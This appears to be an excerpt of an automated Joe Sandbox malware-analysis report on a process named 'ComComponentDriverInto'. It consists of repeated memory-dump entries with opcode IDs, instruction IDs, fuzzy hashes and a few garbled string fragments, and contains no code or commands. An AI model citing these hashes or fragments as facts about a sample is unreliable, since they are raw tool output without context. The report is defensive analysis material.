                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 11ee9b25991690d5d26932c0906425d7227a3d2bb185219ec56b9e0588f19b90
                                                            • Instruction ID: ece5064976a3a09725f684c2ee64a531504c8b0c0e4fa452bcc8fb57161e3d64
                                                            • Opcode Fuzzy Hash: 11ee9b25991690d5d26932c0906425d7227a3d2bb185219ec56b9e0588f19b90
                                                            • Instruction Fuzzy Hash: FF71E230E1E55E8EFB69DBA58864ABCBBB4FF49304F11417AD00ED71E5DE2A6941CB00
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 739f397bcd7d49f3573709236d436131963000fc23f3ba424a75648ef6398a87
                                                            • Instruction ID: 3bdce4f151d4ca7cc25b0c1c03718b0a1324323c74be2b2230cb1ebf786d9347
                                                            • Opcode Fuzzy Hash: 739f397bcd7d49f3573709236d436131963000fc23f3ba424a75648ef6398a87
                                                            • Instruction Fuzzy Hash: 8181F430A1A6AA8FEB2ECF54C4B15B53BE1FF41300B0945BEC44E8B19BCA29E541CF41
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f1dcb8d64fbedfe5c97fca90e552ea58d0ea360b5db85774e8c6e88535f1c28
                                                            • Instruction ID: 5a5cd38ba19c43ebec725f8aa6df4a33af0f8435fffa8d4db0bd4f12f21d2aa8
                                                            • Opcode Fuzzy Hash: 4f1dcb8d64fbedfe5c97fca90e552ea58d0ea360b5db85774e8c6e88535f1c28
                                                            • Instruction Fuzzy Hash: 8C710530F1E55E8EEBA5DBA58865ABC7BB4FF49300F1101BAD00ED71E6DE3969418B40
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22d706541dd8db4bda0e16c1f2d20a03dc5be86a6e02bd415196ccbc6ace2858
                                                            • Instruction ID: d3ab77961f3d755d0e13af6e43cf1443e622a9f8558c2955f28cafe34e7fa649
                                                            • Opcode Fuzzy Hash: 22d706541dd8db4bda0e16c1f2d20a03dc5be86a6e02bd415196ccbc6ace2858
                                                            • Instruction Fuzzy Hash: C6416D31B1E29E4FE731DB95D4616F437A4FF81320F0602B5D448CF1A7DA39AA458B92
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5c972594b99f515d999e0c8e259ec0f286c71296c19bf7fc2383b9894043766d
                                                            • Instruction ID: 9160269debe3bc6ba93695478a95ab09843a1a16ebebc32fc1db1f57d8a2b0e0
                                                            • Opcode Fuzzy Hash: 5c972594b99f515d999e0c8e259ec0f286c71296c19bf7fc2383b9894043766d
                                                            • Instruction Fuzzy Hash: 8D215B31E1995E8FDF98DF98C8609EDBBB1FF58300F50007AD00AE72A1DE256A05CB55
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e6206191abe88948e6a28d243ee768c5faf85fe04d825e9b04bc76439957af50
                                                            • Instruction ID: 6cf2cae679111fc43b0b0bffe1d8b954ca9346dccda055e755f600bcffcabdd5
                                                            • Opcode Fuzzy Hash: e6206191abe88948e6a28d243ee768c5faf85fe04d825e9b04bc76439957af50
                                                            • Instruction Fuzzy Hash: 53115971B0E75D1FE77045A548641E93BE9EB5A350B050077D089D73A1CD592D4287A0
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4bc3369f24d4d8ba6b6be7514ff800f5edb5ad02bf7f3570e8e73f57e347167f
                                                            • Instruction ID: dd4094db2edcd24423a4b724cf0346b04fbf6f68210758995c9ad052e3c309fa
                                                            • Opcode Fuzzy Hash: 4bc3369f24d4d8ba6b6be7514ff800f5edb5ad02bf7f3570e8e73f57e347167f
                                                            • Instruction Fuzzy Hash: 0721DE10A1F2DE0FE76303B508700682FA68F4326471E01FBD0C9CE2E3EA0D1A4AE752
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3137c78a73f91ae2c4ff75aec8a8545be7c083d7b3d40eec04e5989fffaa48cf
                                                            • Instruction ID: 6e5712b1eede6836c33b332adbb9bc284dd3e7112adf00df9e7b50d548d2e8a1
                                                            • Opcode Fuzzy Hash: 3137c78a73f91ae2c4ff75aec8a8545be7c083d7b3d40eec04e5989fffaa48cf
                                                            • Instruction Fuzzy Hash: 23114230B086188FDB98DB58D895AA9B3E1FF59315B1141AAD04ED76A6CA31AC418B40
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d10540654785e3827557e1135f014bc27f226fc4ceb3b3fff131705db371c28e
                                                            • Instruction ID: c5924119e6310828325ed754c99e52cbb0e00db7519d7f9a33d0dc22b3fad87a
                                                            • Opcode Fuzzy Hash: d10540654785e3827557e1135f014bc27f226fc4ceb3b3fff131705db371c28e
                                                            • Instruction Fuzzy Hash: 6B21D720E1D4BF86E63C825D84715B87759EF50311B154A76D48BCB0EBD81DBA809BC0
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 175f4d23e0d9f2e0e87cdaa20f089201e057392c81970b6062d419325c98b20c
                                                            • Instruction ID: 1d692c083bfbac77d320c0715665fe2ddbf70eb92ba8ec20018f8aceae49843f
                                                            • Opcode Fuzzy Hash: 175f4d23e0d9f2e0e87cdaa20f089201e057392c81970b6062d419325c98b20c
                                                            • Instruction Fuzzy Hash: 2E219A41A0F3DA8FE76753B908750B42FB84F03164B1A01FBE0CA8A0F3E94D1A06E752
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e12282365288378e42fe0dc8935542c863c9465904b267bd6518ff8630a21d1a
                                                            • Instruction ID: 7b2ca25c27dd2d30c699ee8dc5aae35fdb8741e3c32de5dcf55207adddaa5e9a
                                                            • Opcode Fuzzy Hash: e12282365288378e42fe0dc8935542c863c9465904b267bd6518ff8630a21d1a
                                                            • Instruction Fuzzy Hash: EA113A30A1D47F86FE3D824984788B47395FF64301B154676D09B8B9EACC2DBA828FD0
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c456aaa1524401bde5738275ee4d9a47c8ac68bac2ab808b50d35aae1ecb912d
                                                            • Instruction ID: 84c03a317eb18181a4d097cbaf636f32e6c6a38708426e014af1ac0b0b5ebbc5
                                                            • Opcode Fuzzy Hash: c456aaa1524401bde5738275ee4d9a47c8ac68bac2ab808b50d35aae1ecb912d
                                                            • Instruction Fuzzy Hash: 0211DA10B2E47F86F638864994749B473D5EF90301B25467AD15F8B4EBC82DBA819FC0
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63e48e0e67a13fee07b3663952f5f2210500b76e692e81a0cc12e237b0c48128
                                                            • Instruction ID: 52341fae37971e4c7eb096bb8de2ed140e3007e9763b44296550a5cd31097e4a
                                                            • Opcode Fuzzy Hash: 63e48e0e67a13fee07b3663952f5f2210500b76e692e81a0cc12e237b0c48128
                                                            • Instruction Fuzzy Hash: 5B112731B0991E4FD769EF6594259F973A0FF58358B00063EE00ECB5E3CE28B5458790
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1be95f472f23117a29d79775ad014c345559e30fe6f5d25ef3ade0960a02bfc1
                                                            • Instruction ID: f413cc3cf1417a9c404cc181d35902bb802ef0360f628f35f570a09fd7cfa3cf
                                                            • Opcode Fuzzy Hash: 1be95f472f23117a29d79775ad014c345559e30fe6f5d25ef3ade0960a02bfc1
                                                            • Instruction Fuzzy Hash: C4119932F0AA6E5FF7B481A54C291BD26D8EF55340F11083AF00AD72F2DD497E068741
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a1a86c987726070e4ece48faf0c1e00d2a67ee874449197ef6c5bc9e389f7c94
                                                            • Instruction ID: eb363ab39de0edf9576d465cc4390ad91b5cc983f92836c7f1d7a046e81ee6f7
                                                            • Opcode Fuzzy Hash: a1a86c987726070e4ece48faf0c1e00d2a67ee874449197ef6c5bc9e389f7c94
                                                            • Instruction Fuzzy Hash: 4B112B31B1991E4FD7A4EB6594658F97394FF58315F00063AE04EC75E3CE25F9458B80
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cbef46a9035930dcd7f09e81a86c3690911faba0c247e33da72f7c59cc6694ff
                                                            • Instruction ID: a3915ae0c6786d93a3ad118263c22978e05b9a13524195977702eaa8a41521aa
                                                            • Opcode Fuzzy Hash: cbef46a9035930dcd7f09e81a86c3690911faba0c247e33da72f7c59cc6694ff
                                                            • Instruction Fuzzy Hash: 7B11A030B0961D8FD798DB58D8AAAB9B3E1FF49315B01027FD04EC76A2CA216941CB40
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08ec702125941d6dbc5e26d81c60dddde6a84965c8301e98df51942eb585428e
                                                            • Instruction ID: b64582cba801cd1da7922d05b2276577227b37d391bc6ef846062572e889dc43
                                                            • Opcode Fuzzy Hash: 08ec702125941d6dbc5e26d81c60dddde6a84965c8301e98df51942eb585428e
                                                            • Instruction Fuzzy Hash: B9114C32B19A1E4FD768AF6494244F97390FF48358B40163BD00ECB1D3CE29B6058790
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8b09714dcfd496007a9a31245a75c639c057ad61c6928dc3517b6fa7f48c110
                                                            • Instruction ID: 93081b28afd2403940e162cc7ed7e9741c7e1bbaf112177542eac50e37583fa2
                                                            • Opcode Fuzzy Hash: f8b09714dcfd496007a9a31245a75c639c057ad61c6928dc3517b6fa7f48c110
                                                            • Instruction Fuzzy Hash: 8811883130A51B8FE7699A58D8646F53394FF54350F01093BE90DCB6E2CF26AA40CB80
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cd05331f94a1e1e8c59ce1e8e2ce074f0114a6e9d481297c4d93b2db836d8dd
                                                            • Instruction ID: e748a92a08083dc31fc581bd3c6dc05c118c09c7d37b0c206a8bf632b3f74fef
                                                            • Opcode Fuzzy Hash: 4cd05331f94a1e1e8c59ce1e8e2ce074f0114a6e9d481297c4d93b2db836d8dd
                                                            • Instruction Fuzzy Hash: 11116B3170A51F8FE7199E48D8686F93394FF59365F11013BD819C72E2CF26AA40CB80
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e63b58d50fb322effcec832c096d00d61797c8cac360e4e888badbddb950a75e
                                                            • Instruction ID: 26df5b05344b38b3904565e75fc944e3b80e688c07315c076b717b5c87d4ac0b
                                                            • Opcode Fuzzy Hash: e63b58d50fb322effcec832c096d00d61797c8cac360e4e888badbddb950a75e
                                                            • Instruction Fuzzy Hash: AB119130B0C71C8FDB68DB5CD8457A9B7E1EB98321F2082AAD04D93256CA75A9468FC1
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d9950320b42d718dd8d787103fc3e2f147144281ab18c2cc14382ac61b2c384
                                                            • Instruction ID: a84ff919401c043cdc680d960f1d1a5efddc55d766050e3636d7d091f9bb9bcb
                                                            • Opcode Fuzzy Hash: 6d9950320b42d718dd8d787103fc3e2f147144281ab18c2cc14382ac61b2c384
                                                            • Instruction Fuzzy Hash: E311483270A51B8FE7199E98E4646F933A4FF55355F01013FE909CB2E2CE35A640CB80
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1fc56cbc17853a684d18b280f06a96486d9cb743d013b39c347045833957b540
                                                            • Instruction ID: 13dd1438de8a28eba20f913a63932893313d13c9ce96384a0c7787dbc3363a22
                                                            • Opcode Fuzzy Hash: 1fc56cbc17853a684d18b280f06a96486d9cb743d013b39c347045833957b540
                                                            • Instruction Fuzzy Hash: 3911C620F0D51D4BE7B4E75898666B87390EF48700F5101B9D86DC32F2EE68AA404E85
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aaa86e1a9641e97b7a1fcccc4fab8e90eda8cbdd0f29ae7670ae56a84d863cd5
                                                            • Instruction ID: 3a79ff705472360a2d81e7b004789b27c2009704c9b91e7db05ccf9681d7b94c
                                                            • Opcode Fuzzy Hash: aaa86e1a9641e97b7a1fcccc4fab8e90eda8cbdd0f29ae7670ae56a84d863cd5
                                                            • Instruction Fuzzy Hash: A611AD31A18A2D8FDB64DF44C454BA9B7A1FB64311F1541BEC44EE72A0CAB5AEC5CF40
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cd5afc3aa5e7ff51895ac6feae5197ca38f3c8e52363692b5e318b40ca75c02d
                                                            • Instruction ID: 664c71e4fcfaf7feb0ecc17dc073c872d97a1738ede89307ed46fe94a5e181bf
                                                            • Opcode Fuzzy Hash: cd5afc3aa5e7ff51895ac6feae5197ca38f3c8e52363692b5e318b40ca75c02d
                                                            • Instruction Fuzzy Hash: 71012B1194E6D51FE76957B44C719F13F90CF97260B0A01FAD095CB1F3C88D18868351
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • API String ID:
                                                            • Opcode ID: 3b5fd07f9e14441761168a6ff0457429a40298b1b5a959356a03bb1a68c1b724
                                                            • Instruction ID: a99b7e5c94f45a5f7f09ca02380e0e68ea50f76bdd34d6ae977846784e90f1ae
                                                            • Opcode Fuzzy Hash: 3b5fd07f9e14441761168a6ff0457429a40298b1b5a959356a03bb1a68c1b724
                                                            • Instruction Fuzzy Hash: 2DC08C3051180C8FC908EB28C88490433A0FB09300BC20090E008C7171D659DCC1CB80
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb833ca749609f7314fa75941b5abe83b9a645aae4ae4f94cbd0fed6fbd6c0f2
                                                            • Instruction ID: 77ae4bda5366d273907ed1b0b411d593cb52b9238af55041abcd65740ae5193e
                                                            • Opcode Fuzzy Hash: eb833ca749609f7314fa75941b5abe83b9a645aae4ae4f94cbd0fed6fbd6c0f2
                                                            • Instruction Fuzzy Hash: 92D09210B0F6AF85F1B85683417023955A96F00701E6A4839E09F458F5C92EBB016F02
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                            • Instruction ID: db7eb27d9785c7c9981c92b7c0a8c18c178f3e342d064d218a915310eded2ab9
                                                            • Opcode Fuzzy Hash: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                            • Instruction Fuzzy Hash: A6C012203088288FDAA8CB4AC4A4A3872D5EF08301B9100B4E40BCB2B5C929A905AB00
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f8dfc65ad8f16764ccc8153da7c79aea334c30a54bafc06d7afd781634f2bd3
                                                            • Instruction ID: a182c1307abcb8ca7bd355204ee6fb189cc277c0933f647c2c8c65a8c900aca1
                                                            • Opcode Fuzzy Hash: 1f8dfc65ad8f16764ccc8153da7c79aea334c30a54bafc06d7afd781634f2bd3
                                                            • Instruction Fuzzy Hash: ADD09220B0F57F86F6794683407023916B85F04300E22103ED05F459E9C96A7A016B02
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21fe969f979db333674e9901948d5af90cb4b426e3a09795154c338914e8feb9
                                                            • Instruction ID: 7cf7a66eddc945f51007b1b51673eb98cbd99f151899c3a8b6cc7b8046a72e6b
                                                            • Opcode Fuzzy Hash: 21fe969f979db333674e9901948d5af90cb4b426e3a09795154c338914e8feb9
                                                            • Instruction Fuzzy Hash: 95C04C05F2DC2A17F3696654443167E14465F58728F654278E11EC62DECD5C6E0206CA
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22c18b74dcd799a1d73eafb7afbd5628e56aef2e65ad0af76b591f55e6eafce0
                                                            • Instruction ID: eccdf8cfbf9cd412e5466d34cebb3af26285ed419c63ac22be4ef502e8be397d
                                                            • Opcode Fuzzy Hash: 22c18b74dcd799a1d73eafb7afbd5628e56aef2e65ad0af76b591f55e6eafce0
                                                            • Instruction Fuzzy Hash: 0BB01200D5741F00E43433FB0C520687440AB44200FC60170D41D90091A8CD12940A57
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 840064bd7cbd5315ab64a15e3181d36e4c11e2de9601b1951485b497951bf716
                                                            • Instruction ID: dfac7cfc0e462e37967af287f3732e25c8ed5f2d4b8babf7520309788d81fdeb
                                                            • Opcode Fuzzy Hash: 840064bd7cbd5315ab64a15e3181d36e4c11e2de9601b1951485b497951bf716
                                                            • Instruction Fuzzy Hash: E3B09211F0922743EA3100E608A51B842898BC42806920A32911E822A2ECAA2A0A1A50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 72508798ecfcbe849ff4fddf2b1385e41789dc75ff7a1a2a926d9faf0f82ff58
                                                            • Instruction ID: d9f0b3401275e26a1a7716e28a2282d73f49f7fa59f4ff89c81f0dab8ec626c9
                                                            • Opcode Fuzzy Hash: 72508798ecfcbe849ff4fddf2b1385e41789dc75ff7a1a2a926d9faf0f82ff58
                                                            • Instruction Fuzzy Hash: DF418F07B0957645E23973FD78219ED5B448FA927FB0847B7F56E8D0D74C486081C2E9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5[_H
                                                            • API String ID: 0-3279724263
                                                            • Opcode ID: f1bc9cf4f546e7fc7e57e1daad284c826bab4008c814b86260e7b338cf36cce9
                                                            • Instruction ID: b2a3f94d93c7803910349d8bd98c56884f2b0959732ca33ae05fc2c742d7a40e
                                                            • Opcode Fuzzy Hash: f1bc9cf4f546e7fc7e57e1daad284c826bab4008c814b86260e7b338cf36cce9
                                                            • Instruction Fuzzy Hash: 8D91E172A19A8D4FE799CB68C8657A87FE1FF99310F0101BAD049DB7E2CBB818118750
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0acdcf10d4879fe2170a0bde597c9ada0af49b8d00787437736c1976dd4630f2
